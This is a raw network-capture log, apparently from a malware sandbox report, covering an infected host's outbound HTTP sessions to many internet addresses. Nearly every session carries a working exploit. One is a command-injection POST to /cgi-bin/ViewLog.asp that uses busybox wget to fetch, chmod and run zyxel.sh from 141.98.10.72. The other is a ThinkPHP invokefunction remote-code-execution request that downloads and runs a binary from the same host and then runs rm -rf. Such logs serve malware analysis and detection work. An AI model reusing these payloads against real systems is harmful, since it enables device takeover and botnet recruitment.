                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:56.208020926 CET341INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:29:57 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Content-Encoding: gzip
                                                            Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            881192.168.2.233445494.122.219.1308080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:56.055686951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            882192.168.2.234632495.131.147.15180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:56.169872999 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:56.407377005 CET317INHTTP/1.1 400 Bad Request
                                                            Server: Web server
                                                            Date: Wed, 14 Feb 2024 08:29:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 155
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            883192.168.2.235539495.82.235.4680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:56.185100079 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:56.437813044 CET317INHTTP/1.1 400 Bad Request
                                                            Server: Web server
                                                            Date: Wed, 14 Feb 2024 08:29:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 155
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            884192.168.2.235675231.51.124.538080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:56.781754971 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:56.986093044 CET411INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 09:28:38 GMT
                                                            Server: Webs
                                                            X-Frame-Options: SAMEORIGIN
                                                            Cache-Control: no-cache
                                                            Content-Length: 166
                                                            Content-Type: text/html
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=60, max=99
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            885192.168.2.235504831.136.84.2558080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:56.785223007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:59.986546040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:06.129688025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:18.160032988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:44.012602091 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            886192.168.2.233330094.120.231.538080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:56.810996056 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            887192.168.2.233476494.120.57.1028080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:57.307415009 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            888192.168.2.233487894.120.13.1488080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:57.308763027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            889192.168.2.235869094.123.98.1938080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:57.309289932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            890192.168.2.234412462.8.84.1438080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:57.640000105 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:57.972917080 CET346INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 11:32:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 169
                                                            Connection: keep-alive
                                                            ETag: "80e8-a9"
                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 4e 56 52 44 56 52 49 50 43 20 57 65 62 20 53 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>NVRDVRIPC Web Server</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            891192.168.2.233994895.85.132.1708080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:58.316174984 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            892192.168.2.234942094.123.53.2138080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:58.328387976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            893192.168.2.235407694.123.243.488080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:58.330107927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            894192.168.2.235385894.120.229.1378080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:58.330351114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            895192.168.2.235025695.217.246.9780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:58.688220024 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:58.912667036 CET339INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:29:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            896192.168.2.234162695.217.66.280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:58.688282013 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:58.913289070 CET419INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:30:14 GMT
                                                            Server: Apache/2.4.6 (CentOS)
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            897192.168.2.235848695.216.175.4280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:58.688311100 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:58.913100004 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            898192.168.2.235903295.163.50.17880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:58.688329935 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:58.917676926 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
